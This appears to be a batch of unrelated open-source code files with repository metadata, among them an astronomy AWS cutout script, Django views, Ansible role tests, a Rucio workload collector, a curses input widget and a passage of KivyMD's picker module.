bkt = s3.Bucket(aws_bucket.split("/")[2])
aws_path = '/'.join(aws_bucket.split("/")[3:])
if sync_fits:
files = glob.glob('{0}*'.format(label))
else:
files = glob.glob('{0}*png'.format(label))
for file in files:
print('{0} -> {1}'.format(file, aws_bucket))
bkt.upload_file(file, '{0}/{1}'.format(aws_path, file).replace('//','/'), ExtraArgs={'ACL': 'public-read'})
#os.system('aws s3 sync --exclude "*" --include "{0}*" ./ {1} --acl public-read'.format(label, aws_bucket))
#os.system("""echo "<pre>" > index.html; aws s3 ls AWSBUCKETX --human-readable | sort -k 1 -k 2 | grep -v index | awk '{printf("%s %s",$1, $2); printf(" %6s %s ", $3, $4); print "<a href="$5">"$5"</a>"}'>> index.html; aws s3 cp index.html AWSBUCKETX --acl public-read""".replace('AWSBUCKETX', aws_bucket))
return has_filts
def get_cutout_from_aws(label='macs0647-jd1', ra=101.9822125, dec=70.24326667, master='grizli-jan2019', scale_ab=21, thumb_height=2.0, remove=1, aws_bucket="s3://grizli/DropoutThumbnails/", lambda_func='grizliImagingCutout', force=False, **kwargs):
"""
Get cutout using AWS lambda
"""
import boto3
import json
#func = 'grizliImagingCutout'
#label = '{0}_{1:05d}'.format(self.cat['root'][ix], self.cat['id'][ix])
#url = 'https://s3.amazonaws.com/grizli/DropoutThumbnails/{0}.thumb.png'
session = boto3.Session()
client = session.client('lambda', region_name='us-east-1')
event = {
'label': label,
"ra": ra,
"dec": dec,
"scale_ab": scale_ab,
"thumb_height": thumb_height,
"aws_bucket":aws_bucket,
"remove":remove,
"master":master,
}
for k in kwargs:
event[k] = kwargs[k]
bucket_split = aws_bucket.strip("s3://").split('/')
bucket_name = bucket_split[0]
bucket_path = '/'.join(bucket_split[1:])
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
bkt = s3.Bucket(bucket_name)
files = [obj.key for obj in bkt.objects.filter(Prefix='{0}/{1}.thumb.png'.format(bucket_path, label))]
if (len(files) == 0) | force:
print('Call lambda: {0}'.format(label))
print(event)
response = client.invoke(
FunctionName=lambda_func,
InvocationType='Event',
LogType='Tail',
Payload=json.dumps(event))
else:
response = None
print('Thumb exists')
return response
def handler(event, context):
import os
import grizli
print(grizli.__version__)
os.chdir('/tmp/')
os.system('rm *')
os.system('rm -rf matplotlib*')
print(event) #['s3_object_path'], event['verbose'])
drizzle_images(**event)
os.system('rm *')
def combine_filters(label='j022708p4901_00273', verbose=True):
"""
Group nearby filters
"""
import glob
import numpy as np
import astropy.io.fits as pyfits
from grizli import utils
filter_queries = {}
filter_queries['uv'] = '{0}-f[2-3]*sci.fits'.format(label)
filter_queries['visb'] = '{0}-f[4-5]*sci.fits'.format(label)
filter_queries['visr'] = '{0}-f[6-8]*sci.fits'.format(label)
filter_queries['y'] = '{0}-f[01][90][85]*sci.fits'.format(label)
filter_queries['j'] = '{0}-f1[12][05]*sci.fits'.format(label)
filter_queries['h'] = '{0}-f1[64]0*sci.fits'.format(label)
grouped_filters = {}
for qfilt in filter_queries:
drz_files = glob.glob(filter_queries[qfilt])
drz_files.sort()
grouped_filters[qfilt] = [f.split('_dr')[0].split('-')[-1] for f in drz_files]
if len(drz_files) > 0:
drz_files.sort()
if verbose:
print('# Combine filters, {0}={1}'.format(qfilt,
'+'.join(drz_files)))
for i, file in enumerate(drz_files[::-1]):
drz = pyfits.open(file)
wht = pyfits.open(file.replace('_sci','_wht'))
sci = drz[0].data*1.
# Subtract background?
if 'IMGMED' in drz[0].header:
sci -= drz[0].header['IMGMED']
drz[0].header['IMGMED'] = 0.
if i == 0:
photflam = drz[0].header['PHOTFLAM']
num = sci*wht[0].data
den = wht[0].data
drz_ref = drz
drz_ref[0].header['CFILT{0}'.format(i+1)] = utils.get_hst_filter(drz[0].header)
drz_ref[0].header['NCOMBINE'] = (len(drz_files), 'Number of combined filters')
else:
scl = drz[0].header['PHOTFLAM']/photflam
num += sci*scl*(wht[0].data/scl**2)
den += wht[0].data/scl**2
drz_ref[0].header['CFILT{0}'.format(i+1)] = utils.get_hst_filter(drz[0].header)
drz_ref[0].header['NDRIZIM'] += drz[0].header['NDRIZIM']
sci = num/den
sci[den == 0] = 0
drz_ref[0].data = sci
pyfits.writeto('{0}-{1}_drz_sci.fits'.format(label, qfilt),
data=sci, header=drz_ref[0].header, overwrite=True,
output_verify='fix')
pyfits.writeto('{0}-{1}_drz_wht.fits'.format(label, qfilt),
data=den, header=drz_ref[0].header, overwrite=True,
output_verify='fix')
return grouped_filters
def show_all_thumbnails(label='j022708p4901_00273', filters=['visb', 'visr', 'y', 'j', 'h'], scale_ab=21, close=True, thumb_height=2., rgb_params=RGB_PARAMS):
"""
Show individual filter and RGB thumbnails
"""
import glob
#from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
import astropy.io.fits as pyfits
from astropy.visualization import make_lupton_rgb
from grizli.pipeline import auto_script
from grizli import utils
all_files = glob.glob('{0}-f*sci.fits'.format(label))
all_filters = [f.split('_dr')[0].split('-')[-1] for f in all_files]
ims = {}
for filter in filters:
drz_files = glob.glob('{0}-{1}*_dr*sci.fits'.format(label, filter))
if len(drz_files) > 0:
im = pyfits.open(drz_files[0])
ims[filter] = im
rgb_params['scale_ab'] = scale_ab
slx, sly, rgb_filts, fig = auto_script.field_rgb(root=label, HOME_PATH=None, **rgb_params) #xsize=4, output_dpi=None, HOME_PATH=None, show_ir=False, pl=1, pf=1, scl=1, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=all_filters, add_labels=False, output_format='png', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.rgb', scale_ab=scale_ab)
if close:
plt.close()
#rgb = np.array(Image.open('{0}.rgb.png'.format(label)))
rgb = plt.imread('{0}.rgb.png'.format(label))
NX = (len(filters)+1)
fig = plt.figure(figsize=[thumb_height*NX, thumb_height])
ax = fig.add_subplot(1,NX,NX)
ax.imshow(rgb, origin='upper', interpolation='nearest')
# ax.text(0.05, 0.95, label, ha='left', va='top', transform=ax.transAxes, fontsize=7, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
# ax.text(0.05, 0.05, ' '.join(rgb_filts), ha='left', va='bottom', transform=ax.transAxes, fontsize=6, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
for i, filter in enumerate(filters):
if filter in ims:
zp_i = utils.calc_header_zeropoint(ims[filter], ext=0)
scl = 10**(-0.4*(zp_i-5-scale_ab))
pixscl = utils.get_wcs_pscale(ims[filter][0].header.copy())
scl *= (0.06/pixscl)**2
img = ims[filter][0].data*scl
image = make_lupton_rgb(img, img, img, stretch=0.1, minimum=-0.01)
ax = fig.add_subplot(1,NX,i+1)
ax.imshow(255-image, origin='lower', interpolation='nearest')
for ax in fig.axes:
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_xticks([])
ax.set_yticks([])
fig.tight_layout(pad=0.1)
# Add labels
xl, yl = 0.04, 0.98
for i, filter in enumerate(filters):
if filter in ims:
if filter in ['uv', 'visb', 'visr', 'y', 'j', 'h']:
grouped_filters = []
h_i = ims[filter][0].header
for j in range(h_i['NCOMBINE']):
grouped_filters.append(h_i['CFILT{0}'.format(j+1)])
text_label = '+'.join(grouped_filters)
else:
text_label = filter
fig.text((i+xl)/NX, yl, text_label, fontsize=7,
ha='left', va='top', transform=fig.transFigure,
bbox=dict(facecolor='w', edgecolor='None', alpha=0.9))
#
fig.text((i+1+xl)/NX, yl, label, ha='left', va='top', transform=fig.transFigure, fontsize=7, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
fig.text((i+1+xl)/NX, 1-yl, ' '.join(rgb_filts), ha='left', va='bottom', transform=fig.transFigure, fontsize=6, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
fig.savefig('{0}.thumb.png'.format(label))
if close:
plt.close()
if __name__ == "__main__":
import sys
if len(sys.argv) < 5:
print('Usage: aws_drizzler.py cp561356 150.208875 1.850241667 40 ')
print(sys.argv)
exit()
#print('xxx')
drizzle_images(label=sys.argv[1], ra=float(sys.argv[2]), dec=float(sys.argv[3]), size=float(sys.argv[4]))
def go():
"""
grep -v "\#" QGs.txt | awk '{print "./aws_drizzler.py",$1,$2,$3,"60"}' > run.sh
grep -v "\#" gomez.txt | awk '{print "./aws_drizzler.py",$1,$2,$3,"60"}' >> run.sh
"""
pass
| 38.637243
| 714
| 0.523175
|
4a189c37b0412d8e20e8f4c84b1613a7b0de5154
| 1,381
|
py
|
Python
|
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image, Location, Category
# Create your views here.
def welcome(request):
images = Image.get_all_images()
locations = Location.get_all_locations()
return render(request, 'welcome.html', {'images': images, 'locations': locations})
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
searched_images = Image.search_by_category(search_term)
message = f"{search_term}"
return render(request,'search.html',{"message":message, "images":searched_images, "category":search_term})
else:
message = "You haven't searched for any category"
return render(request, 'search.html', {"message":message})
# def location(request,location):
# selected_location = Location.objects.get(id = location)
# images = Image.objects.filter(location = selected_location.id)
# return render(request, 'location.html', {"location":selected_location,"images":images})
def filter_by_location(request,location_id):
"""
Function that filters images by location
"""
images = Image.filter_location(id=location_id)
print(id,'it works')
return render (request, 'location.html', {"images":images})
| 32.116279
| 114
| 0.687907
|
4a189c6574bf47c9ebb77c87ea855756c0433ba4
| 1,086
|
py
|
Python
|
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | null | null | null |
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | 1
|
2020-03-24T13:55:19.000Z
|
2020-03-24T13:55:19.000Z
|
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('all')
def test_host(host):
assert host.file("/etc/hosts").exists
def test_icecc_is_installed(host):
icecc = host.package("icecc")
assert icecc.is_installed
def test_icecc_conf_file(host):
icecc_conf_file = '/etc/icecc/icecc.conf'
assert host.file(icecc_conf_file).exists
assert host.file(icecc_conf_file).is_file
content = host.file(icecc_conf_file).content_string
icecc_scheduler_config = \
'ICECC_SCHEDULER_HOST="iceccd-scheduler-lb-placholder.amazonaws.com"'
assert icecc_scheduler_config in content
def test_icecc_systemd_override(host):
icecc_systemd_override_file = \
'/etc/systemd/system/iceccd.service.d/override.conf'
assert host.file(icecc_systemd_override_file).exists
assert host.file(icecc_systemd_override_file).is_file
content = host.file(icecc_systemd_override_file).content_string
assert 'Restart=on-failure' in content
| 30.166667
| 77
| 0.770718
|
4a189c9b7c2d04d65749836cff66716d19918616
| 3,565
|
py
|
Python
|
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2017-08-07T13:34:55.000Z
|
2017-08-07T13:34:55.000Z
|
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2021-06-17T14:15:15.000Z
|
2021-06-17T14:15:15.000Z
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2015-2017
"""
C3PO PanDA workload collector
"""
import logging
from json import loads
from time import time
from requests import get
from rucio.common.config import config_get, config_get_int
from rucio.daemons.c3po.utils.timeseries import RedisTimeSeries
class WorkloadCollector(object):
"""
Collector to retrieve the workload from PanDA. It stores it as a time series in Redis and provides
the average and maximum number of running jobs for a sliding window.
"""
class __WorkloadCollector(object):
"""
Private class needed implement singleton.
"""
def __init__(self, delete_keys=False):
self._avg_jobs = {}
self._cur_jobs = {}
self._max_jobs = {}
self._tms = RedisTimeSeries(config_get('c3po', 'redis_host'), config_get_int('c3po', 'redis_port'), config_get_int('c3po-workload', 'window'), 'jobs_')
self._request_headers = {"Accept": "application/json", "Content-Type": "application/json"}
self._request_url = config_get('c3po-workload', 'panda_url')
if delete_keys:
self._tms.delete_keys()
self.reload_cache()
def reload_cache(self):
self._tms.trim()
for key in self._tms.get_keys():
site = "_".join(key.split('_')[1:])
job_series = self._tms.get_series(site)
num_jobs = len(job_series)
if num_jobs > 0:
self._avg_jobs[site] = sum(job_series) / num_jobs
self._max_jobs[site] = max(job_series)
self._cur_jobs[site] = job_series[-1]
def collect_workload(self):
start = time()
resp = get(self._request_url, headers=self._request_headers)
logging.debug("PanDA response took %fs" % (time() - start))
start = time()
jobs = loads(resp.text)['jobs']
logging.debug("decoding JSON response took %fs" % (time() - start))
sites = {}
start = time()
for job in jobs:
if job['computingsite'] not in sites:
sites[job['computingsite']] = 0
sites[job['computingsite']] += 1
for site, jobs in sites.items():
self._tms.add_point(site, jobs)
logging.debug("processing took %fs" % (time() - start))
self.reload_cache()
instance = None
def __init__(self):
if not WorkloadCollector.instance:
WorkloadCollector.instance = WorkloadCollector.__WorkloadCollector()
def get_avg_jobs(self, site):
return self.instance._avg_jobs[site]
def get_max_jobs(self, site):
return self.instance._max_jobs[site]
def get_cur_jobs(self, site):
return self.instance._cur_jobs[site]
def get_sites(self):
return self.instance._avg_jobs.keys()
def get_job_info(self, site):
return (self.get_cur_jobs(site), self.get_avg_jobs(site), self.get_max_jobs(site))
def get_series(self, site):
return self.instance._tms.get_series(site)
def collect_workload(self):
self.instance.collect_workload()
| 33.632075
| 163
| 0.61655
|
4a189d43f357c0cb120ed3f9b159e657da9bd814
| 991
|
py
|
Python
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 4
|
2020-07-21T12:18:53.000Z
|
2020-11-19T12:30:56.000Z
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 101
|
2020-08-20T16:29:44.000Z
|
2021-01-13T12:41:53.000Z
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 5
|
2020-07-31T11:51:30.000Z
|
2020-10-14T10:25:39.000Z
|
# flake8: noqa
import logging
import pytest
from _pytest.logging import caplog as _caplog
from _pytest.monkeypatch import MonkeyPatch
from loguru import logger
@pytest.fixture(autouse=True)
def no_http_requests(monkeypatch):
"""Prevent any test from making HTTP requests.
Source: https://blog.jerrycodes.com/no-http-requests/
Args:
monkeypatch (MonkeyPatch): [description]
"""
def urlopen_mock(self, method, url, *args, **kwargs):
raise RuntimeError(
f"The test was about to {method} {self.scheme}://{self.host}{url}",
)
monkeypatch.setattr(
"urllib3.connectionpool.HTTPConnectionPool.urlopen", urlopen_mock,
)
@pytest.fixture
def caplog(_caplog):
class PropogateHandler(logging.Handler):
def emit(self, record):
logging.getLogger(record.name).handle(record)
handler_id = logger.add(PropogateHandler(), format="{message} {extra}")
yield _caplog
logger.remove(handler_id)
| 24.170732
| 79
| 0.69223
|
4a189d465eeb521e45ad7d80bc2777823c912d8b
| 61
|
py
|
Python
|
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | 1
|
2021-11-10T15:34:37.000Z
|
2021-11-10T15:34:37.000Z
|
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | null | null | null |
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | 3
|
2020-08-06T15:11:50.000Z
|
2022-01-05T20:21:09.000Z
|
profile = kernel[:, kernel.shape[1] // 2]
plt.plot(profile)
| 15.25
| 41
| 0.655738
|
4a189dd89938ebff3f667f7d1dc0f74475d5e2b1
| 1,444
|
py
|
Python
|
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from PIL import Image
def load_image(path):
if path[-3:] == "dng":
import rawpy
with rawpy.imread(path) as raw:
img = raw.postprocess()
elif path[-3:] == "bmp" or path[-3:] == "jpg" or path[-3:] == "png":
import cv2
return cv2.imread(path)[:, :, ::-1]
else:
img = (255 * plt.imread(path)[:, :, :3]).astype("uint8")
return img
def save_image(
image_numpy, image_path,
):
image_pil = Image.fromarray(image_numpy)
image_pil.save(image_path)
def mkdirs(paths):
if isinstance(paths, list) and not isinstance(paths, str):
for path in paths:
mkdir(path)
else:
mkdir(paths)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def tensor2im(image_tensor, imtype=np.uint8, cent=1.0, factor=255.0 / 2.0):
# def tensor2im(image_tensor, imtype=np.uint8, cent=1., factor=1.):
image_numpy = image_tensor[0].cpu().float().numpy()
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + cent) * factor
return image_numpy.astype(imtype)
def im2tensor(image, imtype=np.uint8, cent=1.0, factor=255.0 / 2.0):
# def im2tensor(image, imtype=np.uint8, cent=1., factor=1.):
return torch.Tensor(
(image / factor - cent)[:, :, :, np.newaxis].transpose((3, 2, 0, 1))
)
| 24.474576
| 76
| 0.617036
|
4a189e62e3f36a6f1111eed1d5158f05e8b619cc
| 1,647
|
py
|
Python
|
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | 2
|
2021-06-10T22:30:41.000Z
|
2021-06-13T21:20:50.000Z
|
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | null | null | null |
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | null | null | null |
import curses
import time
import locale
from curses import textpad
locale.setlocale(locale.LC_ALL, "")
code = locale.getpreferredencoding()
class Input:
def __init__(self,
stdscr,
starty=0,
startx=0,
endy=0,
endx=0,
handle_submit=None):
self.stdscr = stdscr
self.handle_submit = handle_submit
self.starty = starty + 2
self.startx = startx + 2
self.endy = endy - 1
self.endx = endx - 2
self.active = True
scry, scrx = self.stdscr.getmaxyx()
self.available_space = self.endx - self.startx
def render(self, status=None):
win = curses.newwin(2, self.available_space - 2, self.starty,
self.startx)
box = textpad.Textbox(win, insert_mode=True)
curses.echo()
curses.nocbreak()
self.stdscr.refresh()
contents = box.edit(self.__enter_is_terminate)
win.clrtoeol()
del win
self.handle_submit(contents)
curses.noecho()
curses.cbreak()
def receive_input(self, key):
pass
# here it's too late to check for esc to close, this is already parsing input
def __enter_is_terminate(self, x):
if x == 10 or x == 13 or x == curses.KEY_ENTER:
self.stdscr.clear()
return 7
def __printString(self, y, x, text, color):
if color:
self.stdscr.attron(curses.color_pair(color))
self.stdscr.addstr(y, x, text)
if color:
self.stdscr.attroff(curses.color_pair(color))
| 28.894737
| 81
| 0.567699
|
4a18a02641457d32ec9c31e596d3cfbbaf632855
| 299
|
py
|
Python
|
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
from id2020.skeleton import fib
__author__ = "Richard Wolff"
__copyright__ = "Richard Wolff"
__license__ = "mit"
def test_fib():
assert fib(1) == 1
assert fib(2) == 1
assert fib(7) == 13
with pytest.raises(AssertionError):
fib(-10)
| 16.611111
| 39
| 0.635452
|
4a18a186dc12f92d6b6ff7c7a528a2a4c22c80a4
| 37,219
|
py
|
Python
|
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
"""
Components/Pickers
==================
Includes date, time and color picker
`KivyMD` provides the following classes for use:
- MDTimePicker_
- MDDatePicker_
- MDThemePicker_
.. MDTimePicker:
MDTimePicker
------------
.. rubric:: Usage
.. code-block::
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.picker import MDTimePicker
KV = '''
FloatLayout:
MDRaisedButton:
text: "Open time picker"
pos_hint: {'center_x': .5, 'center_y': .5}
on_release: app.show_time_picker()
'''
class Test(MDApp):
def build(self):
return Builder.load_string(KV)
def show_time_picker(self):
'''Open time picker dialog.'''
time_dialog = MDTimePicker()
time_dialog.open()
Test().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDTimePicker.gif
:align: center
Binding method returning set time
---------------------------------
.. code-block:: python
def show_time_picker(self):
time_dialog = MDTimePicker()
time_dialog.bind(time=self.get_time)
time_dialog.open()
def get_time(self, instance, time):
'''
The method returns the set time.
:type instance: <kivymd.uix.picker.MDTimePicker object>
:type time: <class 'datetime.time'>
'''
return time
Open time dialog with the specified time
----------------------------------------
Use the :attr:`~MDTimePicker.set_time` method of the
:class:`~MDTimePicker.` class.
.. code-block:: python
def show_time_picker(self):
from datetime import datetime
# Must be a datetime object
previous_time = datetime.strptime("03:20:00", '%H:%M:%S').time()
time_dialog = MDTimePicker()
time_dialog.set_time(previous_time)
time_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/previous-time.png
:align: center
.. MDDatePicker:
MDDatePicker
------------
When creating an instance of the :class:`~MDDatePicker` class, you must pass
as a parameter a method that will take one argument - a ``datetime`` object.
.. code-block:: python
def get_date(self, date):
'''
:type date: <class 'datetime.date'>
'''
def show_date_picker(self):
date_dialog = MDDatePicker(callback=self.get_date)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDDatePicker.gif
:align: center
Open date dialog with the specified date
----------------------------------------
.. code-block:: python
def show_date_picker(self):
date_dialog = MDDatePicker(
callback=self.get_date,
year=2010,
month=2,
day=12,
)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/previous-date.png
:align: center
You can set the time interval from and to the set date. All days of the week
that are not included in this range will have the status `disabled`.
.. code-block:: python
def show_date_picker(self):
min_date = datetime.strptime("2021:02:15", '%Y:%m:%d').date()
max_date = datetime.strptime("2021:02:20", '%Y:%m:%d').date()
date_dialog = MDDatePicker(
callback=self.get_date,
min_date=min_date,
max_date=max_date,
)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/range-date.png
:align: center
.. MDThemePicker:
MDThemePicker
-------------
.. code-block:: python
def show_theme_picker(self):
theme_dialog = MDThemePicker()
theme_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDThemePicker.gif
:align: center
"""
__all__ = ("MDTimePicker", "MDDatePicker", "MDThemePicker")
import calendar
import datetime
from datetime import date
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.properties import (
BooleanProperty,
ColorProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.modalview import ModalView
from kivy.utils import get_color_from_hex
from kivymd.color_definitions import colors, palette
from kivymd.theming import ThemableBehavior
from kivymd.uix.behaviors import (
CircularRippleBehavior,
RectangularElevationBehavior,
SpecificBackgroundColorBehavior,
)
from kivymd.uix.button import MDIconButton
from kivymd.uix.label import MDLabel
Builder.load_string(
"""
#:import calendar calendar
#:import platform platform
#:import images_path kivymd.images_path
<MDDatePicker>
background: "{}/transparent.png".format(images_path)
cal_layout: cal_layout
size_hint: (None, None)
size:
(dp(328), dp(484)) \
if self.theme_cls.device_orientation == "portrait" \
else (dp(512), dp(304))
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
RoundedRectangle:
size:
(dp(328), dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else (dp(168), dp(304))
pos:
(root.pos[0], root.pos[1] + root.height - dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else (root.pos[0], root.pos[1] + root.height - dp(304))
radius: [root.radius[0], root.radius[1], dp(0), dp(0)] \
if self.theme_cls.device_orientation == "portrait" \
else [root.radius[0], dp(0), dp(0), root.radius[3]]
Color:
rgb: app.theme_cls.bg_normal
RoundedRectangle:
size:
(dp(328), dp(484) - dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else [dp(344), dp(304)]
pos:
(root.pos[0], root.pos[1] + root.height - dp(96) - (dp(484) - dp(96))) \
if self.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(168), root.pos[1])
radius: [dp(0), dp(0), root.radius[2], root.radius[3]] \
if self.theme_cls.device_orientation == "portrait" \
else [dp(0), root.radius[1], root.radius[2], dp(0)]
MDLabel:
id: label_full_date
font_style: "H4"
text_color: root.specific_text_color
theme_text_color: "Custom"
size_hint: (None, None)
size:
(root.width, dp(30)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(168), dp(30))
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height - dp(74)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(3), root.pos[1] + dp(214))
line_height: .84
valign: "middle"
text_size:
(root.width, None) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(149), None)
bold: True
text:
root.fmt_lbl_date(root.sel_year, root.sel_month, root.sel_day, \
root.theme_cls.device_orientation)
MDLabel:
id: label_year
font_style: "Subtitle1"
text_color: root.specific_text_color
theme_text_color: "Custom"
size_hint: (None, None)
size: root.width, dp(30)
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height - dp(40)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(16), root.pos[1] + root.height - dp(41))
valign: "middle"
text: str(root.sel_year)
GridLayout:
id: cal_layout
cols: 7
size:
(dp(44 * 7), dp(40 * 7)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(46 * 7), dp(32 * 7))
col_default_width:
dp(42) if root.theme_cls.device_orientation == "portrait" \
else dp(39)
size_hint: (None, None)
padding:
(dp(2), 0) if root.theme_cls.device_orientation == "portrait" \
else (dp(7), 0)
spacing:
(dp(2), 0) if root.theme_cls.device_orientation == "portrait" \
else (dp(7), 0)
pos:
(root.pos[0] + dp(10), root.pos[1] + dp(60)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(168) + dp(8), root.pos[1] + dp(48))
MDLabel:
id: label_month_selector
font_style: "Body2"
text: calendar.month_name[root.month].capitalize() + " " + str(root.year)
size_hint: (None, None)
size: root.width, dp(30)
pos: root.pos
pos_hint:
{"center_x": .5, "center_y": .75} \
if self.theme_cls.device_orientation == "portrait" \
else {"center_x": .67, "center_y": .915}
valign: "middle"
halign: "center"
MDIconButton:
icon: "chevron-left"
theme_text_color: "Secondary"
pos_hint:
{"center_x": .08, "center_y": .745} \
if root.theme_cls.device_orientation == "portrait" \
else {"center_x": .39, "center_y": .925}
on_release: root.change_month("prev")
MDIconButton:
icon: "chevron-right"
theme_text_color: "Secondary"
pos_hint:
{"center_x": .92, "center_y": .745} \
if root.theme_cls.device_orientation == "portrait" \
else {"center_x": .94, "center_y": .925}
on_release: root.change_month("next")
MDFlatButton:
width: dp(32)
id: ok_button
